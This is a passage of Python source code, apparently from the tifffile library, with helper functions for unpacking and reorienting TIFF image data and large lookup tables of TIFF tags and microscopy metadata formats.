bits = int(numpy.sum(bitspersample))
if not (bits <= 32 and all(i <= dtype.itemsize*8 for i in bitspersample)):
raise ValueError("sample size not supported %s" % str(bitspersample))
dt = next(i for i in 'BHI' if numpy.dtype(i).itemsize*8 >= bits)
data = numpy.fromstring(data, dtype.byteorder+dt)
result = numpy.empty((data.size, len(bitspersample)), dtype.char)
for i, bps in enumerate(bitspersample):
t = data >> int(numpy.sum(bitspersample[i+1:]))
t &= int('0b'+'1'*bps, 2)
if rescale:
o = ((dtype.itemsize * 8) // bps + 1) * bps
if o > data.dtype.itemsize * 8:
t = t.astype('I')
t *= (2**o - 1) // (2**bps - 1)
t //= 2**(o - (dtype.itemsize * 8))
result[:, i] = t
return result.reshape(-1)
def reorient(image, orientation):
"""Return reoriented view of image array.
Parameters
----------
image : numpy array
Non-squeezed output of asarray() functions.
Axes -3 and -2 must be image length and width respectively.
orientation : int or str
One of TIFF_ORIENTATIONS keys or values.
"""
o = TIFF_ORIENTATIONS.get(orientation, orientation)
if o == 'top_left':
return image
elif o == 'top_right':
return image[..., ::-1, :]
elif o == 'bottom_left':
return image[..., ::-1, :, :]
elif o == 'bottom_right':
return image[..., ::-1, ::-1, :]
elif o == 'left_top':
return numpy.swapaxes(image, -3, -2)
elif o == 'right_top':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :]
elif o == 'left_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :, :]
elif o == 'right_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, ::-1, :]
def squeeze_axes(shape, axes, skip='XY'):
"""Return shape and axes with single-dimensional entries removed.
Remove unused dimensions unless their axes are listed in 'skip'.
>>> squeeze_axes((5, 1, 2, 1, 1), 'TZYXC')
((5, 2, 1), 'TYX')
"""
if len(shape) != len(axes):
raise ValueError("dimensions of axes and shape don't match")
shape, axes = zip(*(i for i in zip(shape, axes)
if i[0] > 1 or i[1] in skip))
return shape, ''.join(axes)
def transpose_axes(data, axes, asaxes='CTZYX'):
"""Return data with its axes permuted to match specified axes.
A view is returned if possible.
>>> transpose_axes(numpy.zeros((2, 3, 4, 5)), 'TYXC', asaxes='CTZYX').shape
(5, 2, 1, 3, 4)
"""
for ax in axes:
if ax not in asaxes:
raise ValueError("unknown axis %s" % ax)
# add missing axes to data
shape = data.shape
for ax in reversed(asaxes):
if ax not in axes:
axes = ax + axes
shape = (1,) + shape
data = data.reshape(shape)
# transpose axes
data = data.transpose([axes.index(ax) for ax in asaxes])
return data
def stack_pages(pages, memmap=False, *args, **kwargs):
"""Read data from sequence of TiffPage and stack them vertically.
If memmap is True, return an array stored in a binary file on disk.
Additional parameters are passsed to the page asarray function.
"""
if len(pages) == 0:
raise ValueError("no pages")
if len(pages) == 1:
return pages[0].asarray(memmap=memmap, *args, **kwargs)
result = pages[0].asarray(*args, **kwargs)
shape = (len(pages),) + result.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=result.dtype, shape=shape)
else:
result = numpy.empty(shape, dtype=result.dtype)
for i, page in enumerate(pages):
result[i] = page.asarray(*args, **kwargs)
return result
def stripnull(string):
"""Return string truncated at first null character.
Clean NULL terminated C strings.
>>> stripnull(b'string\\x00') # doctest: +SKIP
b'string'
"""
i = string.find(b'\x00')
return string if (i < 0) else string[:i]
def stripascii(string):
"""Return string truncated at last byte that is 7bit ASCII.
Clean NULL separated and terminated TIFF strings.
>>> stripascii(b'string\\x00string\\n\\x01\\x00') # doctest: +SKIP
b'string\\x00string\\n'
>>> stripascii(b'\\x00') # doctest: +SKIP
b''
"""
# TODO: pythonize this
ord_ = ord if sys.version_info[0] < 3 else lambda x: x
i = len(string)
while i:
i -= 1
if 8 < ord_(string[i]) < 127:
break
else:
i = -1
return string[:i+1]
def format_size(size):
"""Return file size as string from byte size."""
for unit in ('B', 'KB', 'MB', 'GB', 'TB'):
if size < 2048:
return "%.f %s" % (size, unit)
size /= 1024.0
def sequence(value):
"""Return tuple containing value if value is not a sequence.
>>> sequence(1)
(1,)
>>> sequence([1])
[1]
"""
try:
len(value)
return value
except TypeError:
return (value, )
def product(iterable):
"""Return product of sequence of numbers.
Equivalent of functools.reduce(operator.mul, iterable, 1).
>>> product([2**8, 2**30])
274877906944
>>> product([])
1
"""
prod = 1
for i in iterable:
prod *= i
return prod
def natural_sorted(iterable):
"""Return human sorted list of strings.
E.g. for sorting file names.
>>> natural_sorted(['f1', 'f2', 'f10'])
['f1', 'f2', 'f10']
"""
def sortkey(x):
return [(int(c) if c.isdigit() else c) for c in re.split(numbers, x)]
numbers = re.compile(r'(\d+)')
return sorted(iterable, key=sortkey)
def excel_datetime(timestamp, epoch=datetime.datetime.fromordinal(693594)):
"""Return datetime object from timestamp in Excel serial format.
Convert LSM time stamps.
>>> excel_datetime(40237.029999999795)
datetime.datetime(2010, 2, 28, 0, 43, 11, 999982)
"""
return epoch + datetime.timedelta(timestamp)
def julian_datetime(julianday, milisecond=0):
"""Return datetime from days since 1/1/4713 BC and ms since midnight.
Convert Julian dates according to MetaMorph.
>>> julian_datetime(2451576, 54362783)
datetime.datetime(2000, 2, 2, 15, 6, 2, 783)
"""
if julianday <= 1721423:
# no datetime before year 1
return None
a = julianday + 1
if a > 2299160:
alpha = math.trunc((a - 1867216.25) / 36524.25)
a += 1 + alpha - alpha // 4
b = a + (1524 if a > 1721423 else 1158)
c = math.trunc((b - 122.1) / 365.25)
d = math.trunc(365.25 * c)
e = math.trunc((b - d) / 30.6001)
day = b - d - math.trunc(30.6001 * e)
month = e - (1 if e < 13.5 else 13)
year = c - (4716 if month > 2.5 else 4715)
hour, milisecond = divmod(milisecond, 1000 * 60 * 60)
minute, milisecond = divmod(milisecond, 1000 * 60)
second, milisecond = divmod(milisecond, 1000)
return datetime.datetime(year, month, day,
hour, minute, second, milisecond)
def test_tifffile(directory='testimages', verbose=True):
"""Read all images in directory.
Print error message on failure.
>>> test_tifffile(verbose=False)
"""
successful = 0
failed = 0
start = time.time()
for f in glob.glob(os.path.join(directory, '*.*')):
if verbose:
print("\n%s>\n" % f.lower(), end='')
t0 = time.time()
try:
tif = TiffFile(f, multifile=True)
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
try:
img = tif.asarray()
except ValueError:
try:
img = tif[0].asarray()
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
finally:
tif.close()
successful += 1
if verbose:
print("%s, %s %s, %s, %.0f ms" % (
str(tif), str(img.shape), img.dtype, tif[0].compression,
(time.time()-t0) * 1e3))
if verbose:
print("\nSuccessfully read %i of %i files in %.3f s\n" % (
successful, successful+failed, time.time()-start))
class TIFF_SUBFILE_TYPES(object):
def __getitem__(self, key):
result = []
if key & 1:
result.append('reduced_image')
if key & 2:
result.append('page')
if key & 4:
result.append('mask')
return tuple(result)
TIFF_PHOTOMETRICS = {
0: 'miniswhite',
1: 'minisblack',
2: 'rgb',
3: 'palette',
4: 'mask',
5: 'separated', # CMYK
6: 'ycbcr',
8: 'cielab',
9: 'icclab',
10: 'itulab',
32803: 'cfa', # Color Filter Array
32844: 'logl',
32845: 'logluv',
34892: 'linear_raw'
}
TIFF_COMPESSIONS = {
1: None,
2: 'ccittrle',
3: 'ccittfax3',
4: 'ccittfax4',
5: 'lzw',
6: 'ojpeg',
7: 'jpeg',
8: 'adobe_deflate',
9: 't85',
10: 't43',
32766: 'next',
32771: 'ccittrlew',
32773: 'packbits',
32809: 'thunderscan',
32895: 'it8ctpad',
32896: 'it8lw',
32897: 'it8mp',
32898: 'it8bl',
32908: 'pixarfilm',
32909: 'pixarlog',
32946: 'deflate',
32947: 'dcs',
34661: 'jbig',
34676: 'sgilog',
34677: 'sgilog24',
34712: 'jp2000',
34713: 'nef',
}
TIFF_DECOMPESSORS = {
None: lambda x: x,
'adobe_deflate': zlib.decompress,
'deflate': zlib.decompress,
'packbits': decodepackbits,
'lzw': decodelzw,
# 'jpeg': decodejpg
}
TIFF_DATA_TYPES = {
1: '1B', # BYTE 8-bit unsigned integer.
2: '1s', # ASCII 8-bit byte that contains a 7-bit ASCII code;
# the last byte must be NULL (binary zero).
3: '1H', # SHORT 16-bit (2-byte) unsigned integer
4: '1I', # LONG 32-bit (4-byte) unsigned integer.
5: '2I', # RATIONAL Two LONGs: the first represents the numerator of
# a fraction; the second, the denominator.
6: '1b', # SBYTE An 8-bit signed (twos-complement) integer.
7: '1s', # UNDEFINED An 8-bit byte that may contain anything,
# depending on the definition of the field.
8: '1h', # SSHORT A 16-bit (2-byte) signed (twos-complement) integer.
9: '1i', # SLONG A 32-bit (4-byte) signed (twos-complement) integer.
10: '2i', # SRATIONAL Two SLONGs: the first represents the numerator
# of a fraction, the second the denominator.
11: '1f', # FLOAT Single precision (4-byte) IEEE format.
12: '1d', # DOUBLE Double precision (8-byte) IEEE format.
13: '1I', # IFD unsigned 4 byte IFD offset.
#14: '', # UNICODE
#15: '', # COMPLEX
16: '1Q', # LONG8 unsigned 8 byte integer (BigTiff)
17: '1q', # SLONG8 signed 8 byte integer (BigTiff)
18: '1Q', # IFD8 unsigned 8 byte IFD offset (BigTiff)
}
TIFF_SAMPLE_FORMATS = {
1: 'uint',
2: 'int',
3: 'float',
#4: 'void',
#5: 'complex_int',
6: 'complex',
}
TIFF_SAMPLE_DTYPES = {
('uint', 1): '?', # bitmap
('uint', 2): 'B',
('uint', 3): 'B',
('uint', 4): 'B',
('uint', 5): 'B',
('uint', 6): 'B',
('uint', 7): 'B',
('uint', 8): 'B',
('uint', 9): 'H',
('uint', 10): 'H',
('uint', 11): 'H',
('uint', 12): 'H',
('uint', 13): 'H',
('uint', 14): 'H',
('uint', 15): 'H',
('uint', 16): 'H',
('uint', 17): 'I',
('uint', 18): 'I',
('uint', 19): 'I',
('uint', 20): 'I',
('uint', 21): 'I',
('uint', 22): 'I',
('uint', 23): 'I',
('uint', 24): 'I',
('uint', 25): 'I',
('uint', 26): 'I',
('uint', 27): 'I',
('uint', 28): 'I',
('uint', 29): 'I',
('uint', 30): 'I',
('uint', 31): 'I',
('uint', 32): 'I',
('uint', 64): 'Q',
('int', 8): 'b',
('int', 16): 'h',
('int', 32): 'i',
('int', 64): 'q',
('float', 16): 'e',
('float', 32): 'f',
('float', 64): 'd',
('complex', 64): 'F',
('complex', 128): 'D',
('uint', (5, 6, 5)): 'B',
}
TIFF_ORIENTATIONS = {
1: 'top_left',
2: 'top_right',
3: 'bottom_right',
4: 'bottom_left',
5: 'left_top',
6: 'right_top',
7: 'right_bottom',
8: 'left_bottom',
}
# TODO: is there a standard for character axes labels?
AXES_LABELS = {
'X': 'width',
'Y': 'height',
'Z': 'depth',
'S': 'sample', # rgb(a)
'I': 'series', # general sequence, plane, page, IFD
'T': 'time',
'C': 'channel', # color, emission wavelength
'A': 'angle',
'P': 'phase', # formerly F # P is Position in LSM!
'R': 'tile', # region, point, mosaic
'H': 'lifetime', # histogram
'E': 'lambda', # excitation wavelength
'L': 'exposure', # lux
'V': 'event',
'Q': 'other',
#'M': 'mosaic', # LSM 6
}
AXES_LABELS.update(dict((v, k) for k, v in AXES_LABELS.items()))
# Map OME pixel types to numpy dtype
OME_PIXEL_TYPES = {
'int8': 'i1',
'int16': 'i2',
'int32': 'i4',
'uint8': 'u1',
'uint16': 'u2',
'uint32': 'u4',
'float': 'f4',
# 'bit': 'bit',
'double': 'f8',
'complex': 'c8',
'double-complex': 'c16',
}
# NIH Image PicHeader v1.63
NIH_IMAGE_HEADER = [
('fileid', 'a8'),
('nlines', 'i2'),
('pixelsperline', 'i2'),
('version', 'i2'),
('oldlutmode', 'i2'),
('oldncolors', 'i2'),
('colors', 'u1', (3, 32)),
('oldcolorstart', 'i2'),
('colorwidth', 'i2'),
('extracolors', 'u2', (6, 3)),
('nextracolors', 'i2'),
('foregroundindex', 'i2'),
('backgroundindex', 'i2'),
('xscale', 'f8'),
('_x0', 'i2'),
('_x1', 'i2'),
('units_t', 'i2'), # NIH_UNITS_TYPE
('p1', [('x', 'i2'), ('y', 'i2')]),
('p2', [('x', 'i2'), ('y', 'i2')]),
('curvefit_t', 'i2'), # NIH_CURVEFIT_TYPE
('ncoefficients', 'i2'),
('coeff', 'f8', 6),
('_um_len', 'u1'),
('um', 'a15'),
('_x2', 'u1'),
('binarypic', 'b1'),
('slicestart', 'i2'),
('sliceend', 'i2'),
('scalemagnification', 'f4'),
('nslices', 'i2'),
('slicespacing', 'f4'),
('currentslice', 'i2'),
('frameinterval', 'f4'),
('pixelaspectratio', 'f4'),
('colorstart', 'i2'),
('colorend', 'i2'),
('ncolors', 'i2'),
('fill1', '3u2'),
('fill2', '3u2'),
('colortable_t', 'u1'), # NIH_COLORTABLE_TYPE
('lutmode_t', 'u1'), # NIH_LUTMODE_TYPE
('invertedtable', 'b1'),
('zeroclip', 'b1'),
('_xunit_len', 'u1'),
('xunit', 'a11'),
('stacktype_t', 'i2'), # NIH_STACKTYPE_TYPE
]
NIH_COLORTABLE_TYPE = (
'CustomTable', 'AppleDefault', 'Pseudo20', 'Pseudo32', 'Rainbow',
'Fire1', 'Fire2', 'Ice', 'Grays', 'Spectrum')
NIH_LUTMODE_TYPE = (
'PseudoColor', 'OldAppleDefault', 'OldSpectrum', 'GrayScale',
'ColorLut', 'CustomGrayscale')
NIH_CURVEFIT_TYPE = (
'StraightLine', 'Poly2', 'Poly3', 'Poly4', 'Poly5', 'ExpoFit',
'PowerFit', 'LogFit', 'RodbardFit', 'SpareFit1', 'Uncalibrated',
'UncalibratedOD')
NIH_UNITS_TYPE = (
'Nanometers', 'Micrometers', 'Millimeters', 'Centimeters', 'Meters',
'Kilometers', 'Inches', 'Feet', 'Miles', 'Pixels', 'OtherUnits')
NIH_STACKTYPE_TYPE = (
'VolumeStack', 'RGBStack', 'MovieStack', 'HSVStack')
# Map Universal Imaging Corporation MetaMorph internal tag ids to name and type
UIC_TAGS = {
0: ('auto_scale', int),
1: ('min_scale', int),
2: ('max_scale', int),
3: ('spatial_calibration', int),
4: ('x_calibration', Fraction),
5: ('y_calibration', Fraction),
6: ('calibration_units', str),
7: ('name', str),
8: ('thresh_state', int),
9: ('thresh_state_red', int),
10: ('tagid_10', None), # undefined
11: ('thresh_state_green', int),
12: ('thresh_state_blue', int),
13: ('thresh_state_lo', int),
14: ('thresh_state_hi', int),
15: ('zoom', int),
16: ('create_time', julian_datetime),
17: ('last_saved_time', julian_datetime),
18: ('current_buffer', int),
19: ('gray_fit', None),
20: ('gray_point_count', None),
21: ('gray_x', Fraction),
22: ('gray_y', Fraction),
23: ('gray_min', Fraction),
24: ('gray_max', Fraction),
25: ('gray_unit_name', str),
26: ('standard_lut', int),
27: ('wavelength', int),
28: ('stage_position', '(%i,2,2)u4'), # N xy positions as fractions
29: ('camera_chip_offset', '(%i,2,2)u4'), # N xy offsets as fractions
30: ('overlay_mask', None),
31: ('overlay_compress', None),
32: ('overlay', None),
33: ('special_overlay_mask', None),
34: ('special_overlay_compress', None),
35: ('special_overlay', None),
36: ('image_property', read_uic_image_property),
37: ('stage_label', '%ip'), # N str
38: ('autoscale_lo_info', Fraction),
39: ('autoscale_hi_info', Fraction),
40: ('absolute_z', '(%i,2)u4'), # N fractions
41: ('absolute_z_valid', '(%i,)u4'), # N long
42: ('gamma', int),
43: ('gamma_red', int),
44: ('gamma_green', int),
45: ('gamma_blue', int),
46: ('camera_bin', int),
47: ('new_lut', int),
48: ('image_property_ex', None),
49: ('plane_property', int),
50: ('user_lut_table', '(256,3)u1'),
51: ('red_autoscale_info', int),
52: ('red_autoscale_lo_info', Fraction),
53: ('red_autoscale_hi_info', Fraction),
54: ('red_minscale_info', int),
55: ('red_maxscale_info', int),
56: ('green_autoscale_info', int),
57: ('green_autoscale_lo_info', Fraction),
58: ('green_autoscale_hi_info', Fraction),
59: ('green_minscale_info', int),
60: ('green_maxscale_info', int),
61: ('blue_autoscale_info', int),
62: ('blue_autoscale_lo_info', Fraction),
63: ('blue_autoscale_hi_info', Fraction),
64: ('blue_min_scale_info', int),
65: ('blue_max_scale_info', int),
#66: ('overlay_plane_color', read_uic_overlay_plane_color),
}
# Olympus FluoView
MM_DIMENSION = [
('name', 'a16'),
('size', 'i4'),
('origin', 'f8'),
('resolution', 'f8'),
('unit', 'a64'),
]
MM_HEADER = [
('header_flag', 'i2'),
('image_type', 'u1'),
('image_name', 'a257'),
('offset_data', 'u4'),
('palette_size', 'i4'),
('offset_palette0', 'u4'),
('offset_palette1', 'u4'),
('comment_size', 'i4'),
('offset_comment', 'u4'),
('dimensions', MM_DIMENSION, 10),
('offset_position', 'u4'),
('map_type', 'i2'),
('map_min', 'f8'),
('map_max', 'f8'),
('min_value', 'f8'),
('max_value', 'f8'),
('offset_map', 'u4'),
('gamma', 'f8'),
('offset', 'f8'),
('gray_channel', MM_DIMENSION),
('offset_thumbnail', 'u4'),
('voice_field', 'i4'),
('offset_voice_field', 'u4'),
]
# Carl Zeiss LSM
CZ_LSM_INFO = [
('magic_number', 'u4'),
('structure_size', 'i4'),
('dimension_x', 'i4'),
('dimension_y', 'i4'),
('dimension_z', 'i4'),
('dimension_channels', 'i4'),
('dimension_time', 'i4'),
('data_type', 'i4'), # CZ_DATA_TYPES
('thumbnail_x', 'i4'),
('thumbnail_y', 'i4'),
('voxel_size_x', 'f8'),
('voxel_size_y', 'f8'),
('voxel_size_z', 'f8'),
('origin_x', 'f8'),
('origin_y', 'f8'),
('origin_z', 'f8'),
('scan_type', 'u2'),
('spectral_scan', 'u2'),
('type_of_data', 'u4'), # CZ_TYPE_OF_DATA
('offset_vector_overlay', 'u4'),
('offset_input_lut', 'u4'),
('offset_output_lut', 'u4'),
('offset_channel_colors', 'u4'),
('time_interval', 'f8'),
('offset_channel_data_types', 'u4'),
('offset_scan_info', 'u4'), # CZ_LSM_SCAN_INFO
('offset_ks_data', 'u4'),
('offset_time_stamps', 'u4'),
('offset_event_list', 'u4'),
('offset_roi', 'u4'),
('offset_bleach_roi', 'u4'),
('offset_next_recording', 'u4'),
# LSM 2.0 ends here
('display_aspect_x', 'f8'),
('display_aspect_y', 'f8'),
('display_aspect_z', 'f8'),
('display_aspect_time', 'f8'),
('offset_mean_of_roi_overlay', 'u4'),
('offset_topo_isoline_overlay', 'u4'),
('offset_topo_profile_overlay', 'u4'),
('offset_linescan_overlay', 'u4'),
('offset_toolbar_flags', 'u4'),
('offset_channel_wavelength', 'u4'),
('offset_channel_factors', 'u4'),
('objective_sphere_correction', 'f8'),
('offset_unmix_parameters', 'u4'),
# LSM 3.2, 4.0 end here
('offset_acquisition_parameters', 'u4'),
('offset_characteristics', 'u4'),
('offset_palette', 'u4'),
('time_difference_x', 'f8'),
('time_difference_y', 'f8'),
('time_difference_z', 'f8'),
('internal_use_1', 'u4'),
('dimension_p', 'i4'),
('dimension_m', 'i4'),
('dimensions_reserved', '16i4'),
('offset_tile_positions', 'u4'),
('reserved_1', '9u4'),
('offset_positions', 'u4'),
('reserved_2', '21u4'), # must be 0
]
# Import functions for LSM_INFO sub-records
CZ_LSM_INFO_READERS = {
'scan_info': read_cz_lsm_scan_info,
'time_stamps': read_cz_lsm_time_stamps,
'event_list': read_cz_lsm_event_list,
'channel_colors': read_cz_lsm_floatpairs,
'positions': read_cz_lsm_floatpairs,
'tile_positions': read_cz_lsm_floatpairs,
}
# Map cz_lsm_info.scan_type to dimension order
CZ_SCAN_TYPES = {
0: 'XYZCT', # x-y-z scan
1: 'XYZCT', # z scan (x-z plane)
2: 'XYZCT', # line scan
3: 'XYTCZ', # time series x-y
4: 'XYZTC', # time series x-z
5: 'XYTCZ', # time series 'Mean of ROIs'
6: 'XYZTC', # time series x-y-z
7: 'XYCTZ', # spline scan
8: 'XYCZT', # spline scan x-z
9: 'XYTCZ', # time series spline plane x-z
10: 'XYZCT', # point mode
}
# Map dimension codes to cz_lsm_info attribute
CZ_DIMENSIONS = {
'X': 'dimension_x',
'Y': 'dimension_y',
'Z': 'dimension_z',
'C': 'dimension_channels',
'T': 'dimension_time',
}
# Description of cz_lsm_info.data_type
CZ_DATA_TYPES = {
0: 'varying data types',
1: '8 bit unsigned integer',
2: '12 bit unsigned integer',
5: '32 bit float',
}
# Description of cz_lsm_info.type_of_data
CZ_TYPE_OF_DATA = {
0: 'Original scan data',
1: 'Calculated data',
2: '3D reconstruction',
3: 'Topography height map',
}
CZ_LSM_SCAN_INFO_ARRAYS = {
0x20000000: "tracks",
0x30000000: "lasers",
0x60000000: "detection_channels",
0x80000000: "illumination_channels",
0xa0000000: "beam_splitters",
0xc0000000: "data_channels",
0x11000000: "timers",
0x13000000: "markers",
}
CZ_LSM_SCAN_INFO_STRUCTS = {
# 0x10000000: "recording",
0x40000000: "track",
0x50000000: "laser",
0x70000000: "detection_channel",
0x90000000: "illumination_channel",
0xb0000000: "beam_splitter",
0xd0000000: "data_channel",
0x12000000: "timer",
0x14000000: "marker",
}
CZ_LSM_SCAN_INFO_ATTRIBUTES = {
# recording
0x10000001: "name",
0x10000002: "description",
0x10000003: "notes",
0x10000004: "objective",
0x10000005: "processing_summary",
0x10000006: "special_scan_mode",
0x10000007: "scan_type",
0x10000008: "scan_mode",
0x10000009: "number_of_stacks",
0x1000000a: "lines_per_plane",
0x1000000b: "samples_per_line",
0x1000000c: "planes_per_volume",
0x1000000d: "images_width",
0x1000000e: "images_height",
0x1000000f: "images_number_planes",
0x10000010: "images_number_stacks",
0x10000011: "images_number_channels",
0x10000012: "linscan_xy_size",
0x10000013: "scan_direction",
0x10000014: "time_series",
0x10000015: "original_scan_data",
0x10000016: "zoom_x",
0x10000017: "zoom_y",
0x10000018: "zoom_z",
0x10000019: "sample_0x",
0x1000001a: "sample_0y",
0x1000001b: "sample_0z",
0x1000001c: "sample_spacing",
0x1000001d: "line_spacing",
0x1000001e: "plane_spacing",
0x1000001f: "plane_width",
0x10000020: "plane_height",
0x10000021: "volume_depth",
0x10000023: "nutation",
0x10000034: "rotation",
0x10000035: "precession",
0x10000036: "sample_0time",
0x10000037: "start_scan_trigger_in",
0x10000038: "start_scan_trigger_out",
0x10000039: "start_scan_event",
0x10000040: "start_scan_time",
0x10000041: "stop_scan_trigger_in",
0x10000042: "stop_scan_trigger_out",
0x10000043: "stop_scan_event",
0x10000044: "stop_scan_time",
0x10000045: "use_rois",
0x10000046: "use_reduced_memory_rois",
0x10000047: "user",
0x10000048: "use_bc_correction",
0x10000049: "position_bc_correction1",
0x10000050: "position_bc_correction2",
0x10000051: "interpolation_y",
0x10000052: "camera_binning",
0x10000053: "camera_supersampling",
0x10000054: "camera_frame_width",
0x10000055: "camera_frame_height",
0x10000056: "camera_offset_x",
0x10000057: "camera_offset_y",
0x10000059: "rt_binning",
0x1000005a: "rt_frame_width",
0x1000005b: "rt_frame_height",
0x1000005c: "rt_region_width",
0x1000005d: "rt_region_height",
0x1000005e: "rt_offset_x",
0x1000005f: "rt_offset_y",
0x10000060: "rt_zoom",
0x10000061: "rt_line_period",
0x10000062: "prescan",
0x10000063: "scan_direction_z",
# track
0x40000001: "multiplex_type", # 0 after line; 1 after frame
0x40000002: "multiplex_order",
0x40000003: "sampling_mode", # 0 sample; 1 line average; 2 frame average
0x40000004: "sampling_method", # 1 mean; 2 sum
0x40000005: "sampling_number",
0x40000006: "acquire",
0x40000007: "sample_observation_time",
0x4000000b: "time_between_stacks",
0x4000000c: "name",
0x4000000d: "collimator1_name",
0x4000000e: "collimator1_position",
0x4000000f: "collimator2_name",
0x40000010: "collimator2_position",
0x40000011: "is_bleach_track",
0x40000012: "is_bleach_after_scan_number",
0x40000013: "bleach_scan_number",
0x40000014: "trigger_in",
0x40000015: "trigger_out",
0x40000016: "is_ratio_track",
0x40000017: "bleach_count",
0x40000018: "spi_center_wavelength",
0x40000019: "pixel_time",
0x40000021: "condensor_frontlens",
0x40000023: "field_stop_value",
0x40000024: "id_condensor_aperture",
0x40000025: "condensor_aperture",
0x40000026: "id_condensor_revolver",
0x40000027: "condensor_filter",
0x40000028: "id_transmission_filter1",
0x40000029: "id_transmission1",
0x40000030: "id_transmission_filter2",
0x40000031: "id_transmission2",
0x40000032: "repeat_bleach",
0x40000033: "enable_spot_bleach_pos",
0x40000034: "spot_bleach_posx",
0x40000035: "spot_bleach_posy",
0x40000036: "spot_bleach_posz",
0x40000037: "id_tubelens",
0x40000038: "id_tubelens_position",
0x40000039: "transmitted_light",
0x4000003a: "reflected_light",
0x4000003b: "simultan_grab_and_bleach",
0x4000003c: "bleach_pixel_time",
# laser
0x50000001: "name",
0x50000002: "acquire",
0x50000003: "power",
# detection_channel
0x70000001: "integration_mode",
0x70000002: "special_mode",
0x70000003: "detector_gain_first",
0x70000004: "detector_gain_last",
0x70000005: "amplifier_gain_first",
0x70000006: "amplifier_gain_last",
0x70000007: "amplifier_offs_first",
0x70000008: "amplifier_offs_last",
0x70000009: "pinhole_diameter",
0x7000000a: "counting_trigger",
0x7000000b: "acquire",
0x7000000c: "point_detector_name",
0x7000000d: "amplifier_name",
0x7000000e: "pinhole_name",
0x7000000f: "filter_set_name",
0x70000010: "filter_name",
0x70000013: "integrator_name",
0x70000014: "channel_name",
0x70000015: "detector_gain_bc1",
0x70000016: "detector_gain_bc2",
0x70000017: "amplifier_gain_bc1",
0x70000018: "amplifier_gain_bc2",
0x70000019: "amplifier_offset_bc1",
0x70000020: "amplifier_offset_bc2",
0x70000021: "spectral_scan_channels",
0x70000022: "spi_wavelength_start",
0x70000023: "spi_wavelength_stop",
0x70000026: "dye_name",
0x70000027: "dye_folder",
# illumination_channel
0x90000001: "name",
0x90000002: "power",
0x90000003: "wavelength",
0x90000004: "aquire",
0x90000005: "detchannel_name",
0x90000006: "power_bc1",
0x90000007: "power_bc2",
# beam_splitter
0xb0000001: "filter_set",
0xb0000002: "filter",
0xb0000003: "name",
# data_channel
0xd0000001: "name",
0xd0000003: "acquire",
0xd0000004: "color",
0xd0000005: "sample_type",
0xd0000006: "bits_per_sample",
0xd0000007: "ratio_type",
0xd0000008: "ratio_track1",
0xd0000009: "ratio_track2",
0xd000000a: "ratio_channel1",
0xd000000b: "ratio_channel2",
0xd000000c: "ratio_const1",
0xd000000d: "ratio_const2",
0xd000000e: "ratio_const3",
0xd000000f: "ratio_const4",
0xd0000010: "ratio_const5",
0xd0000011: "ratio_const6",
0xd0000012: "ratio_first_images1",
0xd0000013: "ratio_first_images2",
0xd0000014: "dye_name",
0xd0000015: "dye_folder",
0xd0000016: "spectrum",
0xd0000017: "acquire",
# timer
0x12000001: "name",
0x12000002: "description",
0x12000003: "interval",
0x12000004: "trigger_in",
0x12000005: "trigger_out",
0x12000006: "activation_time",
0x12000007: "activation_number",
# marker
0x14000001: "name",
0x14000002: "description",
0x14000003: "trigger_in",
0x14000004: "trigger_out",
}
# Map TIFF tag code to attribute name, default value, type, count, validator
TIFF_TAGS = {
254: ('new_subfile_type', 0, 4, 1, TIFF_SUBFILE_TYPES()),
255: ('subfile_type', None, 3, 1,
{0: 'undefined', 1: 'image', 2: 'reduced_image', 3: 'page'}),
256: ('image_width', None, 4, 1, None),
257: ('image_length', None, 4, 1, None),
258: ('bits_per_sample', 1, 3, 1, None),
259: ('compression', 1, 3, 1, TIFF_COMPESSIONS),
262: ('photometric', None, 3, 1, TIFF_PHOTOMETRICS),
266: ('fill_order', 1, 3, 1, {1: 'msb2lsb', 2: 'lsb2msb'}),
269: ('document_name', None, 2, None, None),
270: ('image_description', None, 2, None, None),
271: ('make', None, 2, None, None),
272: ('model', None, 2, None, None),
273: ('strip_offsets', None, 4, None, None),
274: ('orientation', 1, 3, 1, TIFF_ORIENTATIONS),
277: ('samples_per_pixel', 1, 3, 1, None),
278: ('rows_per_strip', 2**32-1, 4, 1, None),
279: ('strip_byte_counts', None, 4, None, None),
280: ('min_sample_value', None, 3, None, None),
281: ('max_sample_value', None, 3, None, None), # 2**bits_per_sample
282: ('x_resolution', None, 5, 1, None),
283: ('y_resolution', None, 5, 1, None),
284: ('planar_configuration', 1, 3, 1, {1: 'contig', 2: 'separate'}),
285: ('page_name', None, 2, None, None),
286: ('x_position', None, 5, 1, None),
287: ('y_position', None, 5, 1, None),
296: ('resolution_unit', 2, 4, 1, {1: 'none', 2: 'inch', 3: 'centimeter'}),
297: ('page_number', None, 3, 2, None),
305: ('software', None, 2, None, None),
306: ('datetime', None, 2, None, None),
315: ('artist', None, 2, None, None),
316: ('host_computer', None, 2, None, None),
317: ('predictor', 1, 3, 1, {1: None, 2: 'horizontal'}),
318: ('white_point', None, 5, 2, None),
319: ('primary_chromaticities', None, 5, 6, None),
320: ('color_map', None, 3, None, None),
322: ('tile_width', None, 4, 1, None),
323: ('tile_length', None, 4, 1, None),
324: ('tile_offsets', None, 4, None, None),
325: ('tile_byte_counts', None, 4, None, None),
338: ('extra_samples', None, 3, None,
{0: 'unspecified', 1: 'assocalpha', 2: 'unassalpha'}),
339: ('sample_format', 1, 3, 1, TIFF_SAMPLE_FORMATS),
340: ('smin_sample_value', None, None, None, None),
341: ('smax_sample_value', None, None, None, None),
347: ('jpeg_tables', None, 7, None, None),
530: ('ycbcr_subsampling', 1, 3, 2, None),
531: ('ycbcr_positioning', 1, 3, 1, None),
32996: ('sgi_matteing', None, None, 1, None), # use extra_samples
32996: ('sgi_datatype', None, None, 1, None), # use sample_format
32997: ('image_depth', None, 4, 1, None),
32998: ('tile_depth', None, 4, 1, None),
33432: ('copyright', None, 1, None, None),
33445: ('md_file_tag', None, 4, 1, None),
33446: ('md_scale_pixel', None, 5, 1, None),
33447: ('md_color_table', None, 3, None, None),
33448: ('md_lab_name', None, 2, None, None),
33449: ('md_sample_info', None, 2, None, None),
33450: ('md_prep_date', None, 2, None, None),
